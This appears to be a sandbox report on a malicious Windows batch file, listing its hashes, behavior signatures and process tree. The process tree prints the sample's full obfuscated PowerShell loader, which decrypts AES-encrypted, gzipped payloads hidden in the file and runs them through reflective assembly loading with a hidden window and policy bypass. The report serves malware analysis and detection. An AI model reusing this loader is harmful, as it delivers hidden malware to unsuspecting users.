Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
24-05-2024 13:33
Static task
static1
Behavioral task
behavioral1
Sample
e069265534c2841bb1133c2ecf9d95cf73154737beaa3f8a763c7cf5037dc39a.cmd
Resource
win7-20240419-en
windows7-x64
4 signatures
150 seconds
General
-
Target
e069265534c2841bb1133c2ecf9d95cf73154737beaa3f8a763c7cf5037dc39a.cmd
-
Size
80KB
-
MD5
9619f1ddef9f682e7e70d738513fbe95
-
SHA1
f60d6ccae771e30dd908ed35cd430321011d4e72
-
SHA256
e069265534c2841bb1133c2ecf9d95cf73154737beaa3f8a763c7cf5037dc39a
-
SHA512
371bb3fb57b2294c232e35e2b30c314ba879b3effb15cccca254df574fb3f97491d6ccc061e8569d21bfedda81055dcb993fa0c730f1021ac2ac4504e41b5c0a
-
SSDEEP
1536:5kqlZx2cA8O4bhwdKd7KZWcs+whqo8LR8O4mCrnxVIddBxPUJPNuYQti:5kqhtthgKde7Q8o8l3CrCrEPNuxi
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 800 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 800 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exedescription pid process target process PID 3008 wrote to memory of 2004 3008 cmd.exe cmd.exe PID 3008 wrote to memory of 2004 3008 cmd.exe cmd.exe PID 3008 wrote to memory of 2004 3008 cmd.exe cmd.exe PID 3008 wrote to memory of 1808 3008 cmd.exe cmd.exe PID 3008 wrote to memory of 1808 3008 cmd.exe cmd.exe PID 3008 wrote to memory of 1808 3008 cmd.exe cmd.exe PID 3008 wrote to memory of 800 3008 cmd.exe powershell.exe PID 3008 wrote to memory of 800 3008 cmd.exe powershell.exe PID 3008 wrote to memory of 800 3008 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\e069265534c2841bb1133c2ecf9d95cf73154737beaa3f8a763c7cf5037dc39a.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵PID:2004
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execute_function($param_var,$param2_var){ $DUmer=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qdtAj=$DUmer.EntryPoint; $qdtAj.Invoke($null, $param2_var);}$eQNwc = 'C:\Users\Admin\AppData\Local\Temp\e069265534c2841bb1133c2ecf9d95cf73154737beaa3f8a763c7cf5037dc39a.cmd';$host.UI.RawUI.WindowTitle = $eQNwc;$JWNvA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eQNwc).Split([Environment]::NewLine);foreach ($gHmIc in $JWNvA) { if ($gHmIc.StartsWith('oyDvWzHHEgVkFmqgImzX')) { $PFglM=$gHmIc.Substring(20); break; }}$payloads_var=[string[]]$PFglM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:1808
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:800
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/800-4-0x000007FEF54FE000-0x000007FEF54FF000-memory.dmpFilesize
4KB
-
memory/800-5-0x000000001B540000-0x000000001B822000-memory.dmpFilesize
2.9MB
-
memory/800-7-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmpFilesize
9.6MB
-
memory/800-6-0x0000000002240000-0x0000000002248000-memory.dmpFilesize
32KB
-
memory/800-9-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmpFilesize
9.6MB
-
memory/800-8-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmpFilesize
9.6MB
-
memory/800-10-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmpFilesize
9.6MB
-
memory/800-11-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmpFilesize
9.6MB